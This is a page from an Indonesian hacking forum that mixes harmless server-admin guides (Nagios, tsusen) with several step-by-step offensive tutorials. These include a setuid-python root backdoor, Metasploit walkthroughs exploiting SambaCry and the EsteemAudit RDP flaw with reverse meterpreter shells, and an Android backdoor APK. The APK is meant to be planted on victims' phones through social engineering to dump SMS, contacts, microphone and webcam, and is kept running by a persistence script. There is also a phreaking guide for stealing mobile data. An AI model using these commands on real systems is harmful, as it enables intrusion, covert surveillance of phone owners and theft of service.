Welcome, Guest
You have to register before you can post on our site.

Username
  

Password
  





Search Forums

(Advanced Search)

Forum Statistics
» Members: 1,045
» Latest member: dadandien
» Forum threads: 187
» Forum posts: 936

Full Statistics

Online:
There are currently 19 online users.
» 0 Member(s) | 19 Guest(s)

Latest Threads
Tanam rootkit tanpa menam...
Forum: Maintaining Access
Last Post: koboi
11-18-2017, 10:25 AM
» Replies: 0
» Views: 541
VPN GRATIS Dengan Layanan...
Forum: Networking
Last Post: penjagalilin
11-18-2017, 04:26 AM
» Replies: 0
» Views: 267
Phreaking with OpenWRT
Forum: Networking
Last Post: penjagalilin
11-13-2017, 05:50 AM
» Replies: 2
» Views: 315
Cara install tsusen di Ub...
Forum: Server
Last Post: koboi
10-22-2017, 04:11 PM
» Replies: 0
» Views: 1,145
[ASK] Membuat Virtual Hos...
Forum: Server
Last Post: koboi
10-22-2017, 03:43 PM
» Replies: 4
» Views: 2,764
VPN AcCount Free
Forum: Networking
Last Post: penjagalilin
10-21-2017, 02:29 AM
» Replies: 1
» Views: 1,909
Install nagios di ubuntu ...
Forum: Server
Last Post: koboi
10-06-2017, 06:43 AM
» Replies: 0
» Views: 2,175
Upload Webshell from Uplo...
Forum: Web Attack
Last Post: raden yulianto
08-19-2017, 06:35 AM
» Replies: 4
» Views: 3,615
Cara patch server dari se...
Forum: Webmaster Security
Last Post: kowlon
08-14-2017, 04:47 AM
» Replies: 1
» Views: 3,768
Hacking Wifi dengan Wifit...
Forum: Wireless Kungfu
Last Post: penjagalilin
08-08-2017, 07:58 AM
» Replies: 14
» Views: 8,317

 
  Tanam rootkit tanpa menambahkan file/rootkit ke dalam server
Posted by: koboi - 11-18-2017, 10:25 AM - Forum: Maintaining Access - No Replies

Oke kali ini saya coba sharing trik sederhana cara menanam rootkit tanpa upload rootkit/file ke dalam server.
Gimana caranya?? Ko bisa?? Penasaran bukan??

Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini

Code:
$ chmod +s /usr/bin/python2.7

Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini

Code:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ python
Python 2.7.14 (default, Sep 23 2017, 22:06:14)
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system('id')
uid=0(root) gid=0(root) groups=0(root),1000(user)
>>> os.system('/bin/bash')
$ id
uid=0(root) gid=0(root) groups=0(root),1000(user)

Cukup mudah bukan??
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid di sini. Kali ini caranya cukup sederhana banget bukan. :)

Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe

Mungkin cukup sekian tutorial dari saya.
Semoga tutorialnya bermanfaat. :)

Print this item

  VPN GRATIS Dengan Layanan PORT FORWARDING
Posted by: penjagalilin - 11-18-2017, 04:26 AM - Forum: Networking - No Replies

Sudah banyak yang tahu tentang NGROK kan? Yah, Ngrok memang gratis. Tapi amat disayangkan port Ngrok selalu berganti bagi user gratisan. Solusinya adalah dengan menggunakan TUNNEL.MY.ID
Jika tidak salah, situs TUNNEL.MY.ID ini dibuat oleh KangArie.




Q&A

Q: Untuk siapa layanan vpn port forward, vpn interkoneksi, dan HTTP reserve proxy?

A: Untuk router yang koneksi internetnya tidak memiliki akses ke IP Public





Q: Apa contoh router yang ga dpt akses ke IP public?

A: Pengguna Modem GSM/CDMA, pengguna wifi.id, client rt/rw net





Q: Ini untuk internet gratis atau menghemat quota?

A: Bukan





Q: Ini untuk traffic keluar, misal utk main game atau browsing atau ganti ip public?

A: Bukan





Q: Apakah ada quota utk tunnel DNS?

A: Tidak ada





Q: Kapan akun vpn akan dihapus?

A: Jika anda free member, maka sistem akan menghapus akun vpn jika selama seminggu vpn tidak aktif





Q: Apakah layanan ini gratis?

A: Ya, server US free. Sedangkan server ID berbayar. Untuk DDNS dan Userman gratis



Nah begitulah kira - kira. Ane sempet dokumentasiin dikit pas nyoba buat port forward Apache.
Langsung saja deh kalian simak video dibawah ini.




Oke sekian gitu aja, semoga bermanfaat!

Print this item

  Phreaking with OpenWRT
Posted by: penjagalilin - 11-09-2017, 06:31 PM - Forum: Networking - Replies (2)

Mumpung sedang nganggur dan suntuk gatau mau ngapain, mendingan nulis di forum ya kan. Nulis dikit lah gapapa.
Oke jadi mungkin udah pada ga asing lagi sama yang namanya OpenWRT. Apaan sih? Cari tau aja di situs OpenWRT langsung.
Intinya dengan OpenWRT yang OpenSource ini kita bisa ngerubah router menjadi lebih dari sekedar router, maksudnya router itu bisa dikembangkan lagi, misalnya untuk keperluan IoT Device, Web Server, File Sharing Server, CCTV, Print Server, Music Player Server, Downloader Server, dsb. Nah dalam thread kali ini kita bakalan gunain untuk kepentingan Phreaking (baca: gretongan).

Penampakan HG553

[Image: 23509015_1483883955052357_88306912033964...e=5AA3ADF5]


Kenapa phreaking pake Router ber-OpenWRT?
Phreaking ISP GSM biasanya dilakukan di HP/Komputer. Artinya HP/Komputer perlu nyala terus cuma buat kegiatan phreaking. Dengan melakukan phreaking di router ber-OpenWRT yang memang salah satu tugasnya adalah untuk selalu menyala, maka Laptop udah gaperlu nyala secara nonstop lagi, kasihan kan kalo dipaksa nyala nonstop. Lalu phreaking biasanya menuntut Laptop/HP untuk menjalankan beberapa tools program yang dibutuhkan (misalnya pakai HTTP Injector, Inject PC, Bitvise, KPN Tunnel, Psiphone, dsb) yang tentunya ini bikin risih, sekaligus memakan resource Laptop/HP yang ada, makanya kita pake router ber-OpenWRT supaya Laptop/HP kita tinggal connect saja via WiFi si router (atau kabel LAN) tanpa perlu menjalankan tools program tambahan. Jadi, soal tugas phreaking akan benar-benar didedikasikan oleh si router saja.


Alat :
- Huawei HG553 Wireless Router (WAJIB)
- Sierra312U USB Modem (atau modem lain)
- SIM Card dengan ISP yang lagi bisa dipake gretongan (misal : Tri)
Bahan :
- Firmware LEDE Pulpstone (TUTOR FLASHING)
- Firmware OpenWRT CC Angel Beats (Tutor ada didalam file)
- Akun SSH/VPN (misalnya dari FastSSH)
- Payload

Tata cara flash, jika HG553 kalian masih pakai firmware original :
Flash LEDE Pulpstone pakai opsi Firmware Upgrade > lalu Flash OpenWRT CC Angel Beats

Semua tutor lengkap Flash udah tertera di file firmware yang kalian download diatas, jadi budayakan membaca!



Proof :





Oke sekian seperti itu saja. Semoga bermanfaat.

Print this item

  Cara install tsusen di Ubuntu 16.04/17.04 (Monitoring trafic berbasis web)
Posted by: koboi - 10-22-2017, 04:11 PM - Forum: Server - No Replies

Malam guys..
Kali ini saya akan coba mempraktekan cara install tsusen di dalam web server..
Sebelum masuk ke tutorial ada yang tau tsusen itu apa??

Okay, mungkin saya akan menjelaskan secara singkat mengenai tsusen ini..
Tsusen adalah aplikasi untuk monitoring setiap trafic masuk di dalam port tcp. Aplikasi ini cocok buat kalian yang ingin memperdalam untuk menjadi sysadmin. Di tsusen ini kita bisa memonitoring ip mana saja yang melakukan request masuk yang paling banyak ke dalam web server kita. Untuk informasi lebih lanjut bisa di lihat di github informasinya.

Kita lanjut ke tutorial, caranya cukup mudah kita tinggal ketik perintah ini di console..

Code:
root[~] >> apt-get install git python-pip python-pcapy screen
root[~] >> pip install python-geoip python-geoip-geolite2
root[~] >> git clone https://github.com/stamparm/tsusen

Untuk menjalankannya melalui backgroun kita bisa ketik di terminal menggunakan screen agar si tsusennya bisa terus berjalan saat terminal kita di close. Kurang lebih perintahnya seperti ini.

Code:
root[~] >> screen
root[/root/tsusen] >> cd tsusen/
root[/root/tsusen] >> python tsusen.py

Saat tsusen berjalan, secara default dia akan membuka port 3889
Untuk mengaksesnya kita tinggal buka alamat ip address atau domain di tambah port 3889 di dalam browser.
Contoh alamatnya seperti ini:


Quote:http://backboxindonesia.or.id:3889


Kurang lebih hasilnya akan menjadi seperti ini

[Image: GjiY0RdIQHOXa4Rv3UBCyQ.png]

[Image: M-v2jVRQQtWQsdz_tcSTmw.png]

Mungkin cukup sekian tutor dari saya.
Semoga ilmunya bermanfaat...

Print this item

  Install nagios di ubuntu 16.04/17.04 server
Posted by: koboi - 10-06-2017, 06:43 AM - Forum: Server - No Replies

Perintah untuk install nagios


Code:
user[~] >> sudo su
root[~] >> apt-get install wget build-essential apache2 php apache2-mod-php7.0 php-gd libgd-dev sendmail unzip
root[~] >> useradd nagios
root[~] >> groupadd nagcmd
root[~] >> usermod -a -G nagcmd nagios
root[~] >> usermod -a -G nagios,nagcmd www-data
root[~] >> cd ~
root[~] >> wget https://assets.nagios.com/downloads/nagioscore/releases/nagios-4.3.2.tar.gz
root[~] >> tar -xzf nagios*.tar.gz
root[~] >> cd nagios-4.3.2/
root[~] >> ./configure --with-nagios-group=nagios --with-command-group=nagcmd
root[~] >> make all
root[~] >> make install
root[~] >> make install-commandmode
root[~] >> make install-init
root[~] >> make install-config
root[~] >> /usr/bin/install -c -m 644 sample-config/httpd.conf /etc/apache2/sites-available/nagios.conf
root[~] >> cp -R contrib/eventhandlers/ /usr/local/nagios/libexec/
root[~] >> chown -R nagios:nagios /usr/local/nagios/libexec/eventhandlers
root[~] >> cd ~
root[~] >> wget https://nagios-plugins.org/download/nagios-plugins-2.2.1.tar.gz
root[~] >> tar -xzf nagios-plugins*.tar.gz
root[~] >> cd nagios-plugin-2.2.1/
root[~] >> ./configure --with-nagios-user=nagios --with-nagios-group=nagios --with-openssl
root[~] >> make
root[~] >> make install
root[~] >> nano /usr/local/nagios/etc/objects/contacts.cfg


Edit contact email, contoh


Quote:email budi@backboxindonesia.or.id


Perintah selanjutnya


Code:
root[~] >> a2enmod rewrite
root[~] >> a2enmod cgi
root[~] >> htpasswd -c /usr/local/nagios/etc/htpasswd.users nagiosadmin


Masukan password untuk login nagiosnya
Kemudian ketik lagi perintah di bawah


Code:
root[~] >> ln -s /etc/apache2/sites-available/nagios.conf /etc/apache2/sites-enabled/
root[~] >> nano /etc/systemd/system/nagios.service


Di dalam nano tambahkan script ini


Quote:[Unit]
Description=Nagios
BindTo=network.target


[Install]
WantedBy=multi-user.target

[Service]
User=nagios
Group=nagios
Type=simple
ExecStart=/usr/local/nagios/bin/nagios /usr/local/nagios/etc/nagios.cfg


Selanjutnya masukan perintah ini


Code:
root[~] >> systemctl enable /etc/systemd/system/nagios.service
root[~] >> systemctl apache2 restart
root[~] >> systemctl nagios start
root[~] >> systemctl nagios restart


Testing nagios di browser, contoh alamatnya http://192.168.1.69/nagios/
Kalo muncul popup login berarti nagios sudah kita install.
Setelah itu masukkan username dan password yang telah kita buat tadi. Sebagai contoh


Quote:User : nagiosadmin
Pass : passwordygkitabuattadi


Step selanjutnya menambahkan host di dalam nagios, perintahnya adalah


Code:
root[~] >> apt-get install nagios-nrpe-server nagios-plugins
root[~] >> nano /etc/nagios/nrpe.cfg


Ganti server_address dengan ip address kita


Quote:server_address=192.168.1.69


Masukan perintah ini


Code:
root[~] >> service nagios-nrpe-server restart
root[~] >> nano /usr/local/nagios/etc/objects/baru.cfg


Masukan script ini untuk menambahkan host ke dalam nagios


Quote:define host{
        use                     linux-server
        host_name               Server
        alias                   Server
        address                 192.168.1.2
        }


Perintah selanjutnya adalah


Code:
root[~] >> nano /usr/local/nagios/etc/nagios.cfg


Setelah itu kita tambahkan script ini


Quote:cfg_file=/usr/local/nagios/etc/objects/baru.cfg


Sampai di sini nagios sudah bisa kita gunakan. Untuk perintah selanjutnya kita reload terlebih dahulu nagiosnya sebelum kita buka di browser dengan perintah ini.


Code:
root[~] >> /etc/init.d/nagios restart


Setelah di restart kita buka alamat ini http://192.168.1.69/nagios/ di browser. Dan setelah di tambah beberapa host di config nagios kurang lebih seperti ini tampilannya..

[Image: ZhgX1m5hQ_uQxt6BuGq2LQ.png]

Maaf kalo tutorialnya singkat banget. hehe
Akhir kata, selamat belajar. :)

Print this item

Big Grin Tutorial Testing WannaCry and Petrwrap Petya 2017
Posted by: Habil Moonz - 07-03-2017, 12:32 PM - Forum: Exploitation - No Replies

Ini hanya Tutorial Testing Ransomware yang sekarang lagi booming di Tahun 2017.
Yaitu Ransomware WannaCry dan Petrwrap/Petya.
Gunakan Dengan Resiko Anda Sendiri.
Untuk tujuan pembelajaran saja.
Untuk tujuan pendidikan saja
NOTE : JANGAN DIJAILIN KE ORANG, TEMAN, KE WARNET, ATAU PACAR.
KALO GABISA DECRYPT NYA !!! :V :gerah:lol



Print this item

  Backbox 4.7 amd64 Freeze
Posted by: synalberto - 06-15-2017, 03:00 AM - Forum: Support - Replies (2)

Para master dan para suhu backbox, saya mau meminta bantuan terkait backbox saya.
Kenapa backbox saya sering freeze? saya coba pakai magicsysrq tetapi tetap saja tidak bisa. Netbook tidak bisa diapa-apain, pointer tidak bergerak dan keyboard tidak berfungsi. Selama ini saya mengatasinya dengan force shutdown(tekan tombol power beberapa waktu), kalo saya menggunakan cara ini secara terus menerus saya khawatir hardware saya akan rusak. Tolong tanggapan dan solusi dari para master,suhu, dan teman teman backbox. Terima kasih

Print this item

Bug Samba Exploit (CVE-2017-7494) SambaCry?
Posted by: penjagalilin - 06-14-2017, 04:12 AM - Forum: Exploitation - No Replies

Setelah beberapa waktu lalu sempet tenar WannaCry dengan memakai SMB Exploit (EternalBlue & DoublePulsar) di Windows, sesaat kemudian juga ditemukan vulnerability di OS keluarga Linux yang menjalankan SAMBA sebagai file-sharing daemon nya. Samba Exploit ini dapat menyerang service Samba versi 3.5.0 sampai 4.4.14, 4.5.10, and 4.6.4. Lebih tepatnya exploit ini memanfaatkan bug writeable file pada versi Samba tersebut untuk melakukan RCE (Remote Code Execution) di komputer korban.





1. Dapatkan module Metasploit dari Samba Exploit (is_known_pipename.rb)

Code:
root@attackermachine~:# wget https://github.com/rapid7/metasploit-framework/blob/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /opt/metasploit-frameworks/modules/exploits/linux/samba/sambacry.rb

Keterangan :
wget akan mengunduh file is_known_pipe_name.rb dan akan menaruhnya di direktori Metasploit Framework dengan nama sambacry.rb
Dalam hal ini bisa saja letak direktori Metasploit Framework kalian bukan di /opt/


2. Jalankan msfconsole dan mulai exploitasi

Code:
root@attackermachine~:# msfconsole
msf > use exploit/linux/samba/sambacry
msf exploit(sambacry) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf exploit(sambacry) > set RHOST IP_KORBAN
msf exploit(sambacry) > set LHOST IP_LISTENER_ATTACKER
msf exploit(sambacry) > set TARGET 3
msf exploit(sambacry) > exploit

Keterangan :
Jika architecture OS korban adalah 32bit maka : set PAYLOAD linux/meterpreter/reverse_tcp
Untuk set TARGET saya memilih opsi 3, jalankan perintah show targets untuk melihat list architecture target yang tersedia.




3. Jika exploitasi berhasil, maka akan muncul tampilan seperti berikut





Bonus video :







Oke sekian post nya, semoga bermanfaat. Terimakasih.

Print this item

Bug RDP Exploit dengan EsteemAudit
Posted by: penjagalilin - 06-11-2017, 12:03 PM - Forum: Exploitation - Replies (3)

Setelah ramai dengan Eternal Exploit pada WannaCry Ransomware, masih ada salah satu Exploit dari NSA yang belum di-patch! EsteemAudit atau disebut dengan CVE-2017-9073 adalah sebuah Exploit Remote Desktop Connection (RDP) pada sistem operasi Windows Server 2003 dan Windows XP.

[Image: Untitled-1.png]

Dalam post ini saya akan memakai EsteemAudit dari FuzzyBunch yang sudah di porting menjadi module Metasploit


1. Download & ekstrak file yang dibutuhkan
Source : Esteemaudit-Metasploit

Atau clone langsung seperti berikut

Code:
root@attackermachine:~/tool# git clone https://github.com/BlackMathIT/Esteemaudit-Metasploit.git
root@attackermachine:~/tool# cd Esteemaudit-Metasploit/
root@attackermachine:~/tool/Esteemaudit-Metasploit# ls -l



2. Didalam nya akan ada 2 file dan 1 folder. Pindahkan semua file yang dibutuhkan ke direktori yang diperlukan.

Code:
root@attackermachine:~/tool/Esteemaudit-Metasploit# mkdir /opt/metasploit-framework/modules/exploits/windows/rdp
root@attackermachine:~/tool/Esteemaudit-Metasploit# cp esteemaudit.rb /opt/metasploit-framework/modules/exploits/windows/rdp/
root@attackermachine:~/tool/Esteemaudit-Metasploit# cd files/
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# mkdir /usr/share/esteemaudit
root@attackermachine:~/tool/Esteemaudit-Metasploit/files# cp * /usr/share/esteemaudit/



3. Buka msfconsole dan mulai exploitasi dengan EsteemAudit

Code:
msf > use exploit/windows/rdp/esteemaudit
msf exploit(esteemaudit) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(esteemaudit) > set LHOST IP_LISTENER_ATTACKER
msf exploit(esteemaudit) > set LPORT PORT_LISTERNER_ATTACKER
msf exploit(esteemaudit) > set TARGETARCHITECTURE x86

Jika target/korban adalah 64bit maka :
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set TARGETARCHITECTURE x86 64-bit 

Lihat target apa saja yang bisa di exploit dengan modul ini dengan perintah berikut

Code:
msf exploit(esteemaudit) > show targets

[Image: Lp-lKatrRRWov39DR-Ykww.png]

Set target sesuai urutan nomor list yang ada dan jalankan exploit. Misalnya jika targetnya adalah Windows XP SP2 maka seperti berikut.

Code:
msf exploit(esteemaudit) > set TARGET 4
msf exploit(esteemaudit) > exploit

Jika sukses akan terbuka sesi meterpreter seperti berikut.

[Image: aIkCQ0tqRV2IE2LSpSZMog.png]




Bonus Video :







NOTES :
Hanya untuk RDP pada server windows yang menggunakan DOMAIN, bukan WORKGROUP.

Oke sekian pos nya, semoga bermanfaat. Terimakasih.

Print this item

  Persistents Android Backdoor All Network (Public/Local)
Posted by: penjagalilin - 06-11-2017, 09:46 AM - Forum: Maintaining Access - Replies (2)

Menyebalkan ketika sudah mendapatkan sesi meterpreter namun mendadak disconnected di tengah jalan karena koneksi yang buruk. Untuk itu kita perlu backdoor yang dilengkapi persistensi supaya attacker dan korban bisa tetap kembali terhubung walau terputus ditengah jalan.



1. Biasanya kita menggunakan msfvenom untuk membuat sebuah backdoor yang nantinya akan ditanam di smarphone korban.

Code:
root@attackermachine:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_LISTENER_ATTACKER LPORT=PORT_LISTENER_ATTACKER R > /tmp/backdoor.apk

Keterangan 
LHOST : diisi dengan IP Address attacker yang akan digunakan untuk listening. Jika serangan dilakukan dijaringan lokal maka diisi IP komputer attacker. Jika serangan dilakukan pada korban/target yang berada diluar jaringan (Public / over Internet) maka masukkan IP Address Public attacker yang sudah dikonfigurasi untuk memiliki layanan port forwarding.
LPORT : diisi dengan Port dari IP attacker.
*Untuk via Public dalam contoh ini misalnya bisa memakai layanan forwarding dari platform Ngrok.com


2. Lalu attacker melakukan listening dengan modul multi handler dari msfconsole seperti berikut

Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST IP_LISTENER_ATTACKER
msf exploit(handler) > set LPORT PORT_LISTENER_ATTACKER
msf exploit(handler) > exploit



3. Kemudian selanjutnya diperlukan Social Engineering terhadap korban supaya backdoor.apk didownload dan diinstall pada smartphone korban.


4. Saat korban menjalankan backdoor.apk maka akan terbuka sebuah sesi meterpreter seperti berikut

[Image: FFVQ4m46SYGH20jrSJsfHA.png]

Dari sini attacker sudah bisa melakukan aktivitas pada smartphone korban seperti dump_sms, dump_contacts, record_mic, webcam_snap, webcam_stream dan lain sebaginya. Jika sudah mari kita lanjutkan.


5. Selanjutnya kita akan buat sesi tersebut menjadi persistents. Maka buat sebuah file yang berisi script seperti berikut

Code:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Simpan script tersebut menjadi sebuah file berformat .sh misalnya sys.sh dan simpan dimana saja misalnya di /tmp/


6. Upload file tersebut ke smartphone korban via sesi meterpreter, upload di direktori /system/etc/init.d/ atau di /etc/init.d/ pada smartphone korban.

Code:
meterpreter > cd /system/etc/init.d/
meterpreter > upload /tmp/sys.sh

Namun hal ini memerlukan akses user root, jika smartphone sudah dalam keadaan rooted baiknya lakukan upload pada direktori ini. Namun jika belum rooted, maka solusinya pada post ini saya akan upload pada direktori /sdcard/Download/  dalam smartphone korban.

Code:
meterpreter > cd /sdcard/Download/
meterpreter > upload /tmp/sys.sh



7. Eksekusi file sys.sh tersebut dengan membuka sesi console lewat meterpreter dengan perintah shell.

Code:
meterpreter > shell

[Image: NRj9fatYSk_oNzTME9gCAg.png]

Kemudian jalankan perintah berikut.

Code:
cd /sdcard/Download/
sh sys.sh

Jika sukses akan muncul output seperti berikut

[Image: qwmkkNkHSVK7Lb3lq5mXdg.png]

Tekan Ctrl+C kemudian Y untuk keluar. Jangan kawatir, persistents akan tetap perjalan di smartphone korban. Dan selesai.



BUKTI

[Image: EzFNc2QQTc2ZaE0lAqAp1Q.png]

[Image: D8Iir9gaRd2Sjr2KZTCQuw.png]

Untuk pembuktian diatas saya menempatkan sesi meterpreter yang berjalan menjadi background dan menjalankan listener kembali secara berkali - kali, dan.. korban secara otomatis akan re-connect pada komputer attacker.



Bonus video :






Notes :
  • Jika smartphone korban dalam keadaan rooted dan IP+Port listener attacker adalah Static maka persistents akan berfungsi selamanya, meskipun korban melakukan reboot.
  • Saat korban menjalankan backdoor.apk yang sudah terinstall, maka persistents akan otomatis berjalan.
  • Bisa untuk jaringan Publik.
  • Bisa untuk jaringan Local, tentu saja.
  • Untuk menghentikan persistents di korban non-root, lakukan reboot pada smartphone korban.


Oke sekian post nya, semoga bermanfaat. Terimakasih.

Print this item

  • 1
  • 2
  • 3
  • 4
  • 5
  • 19
  • »
  • Jump to page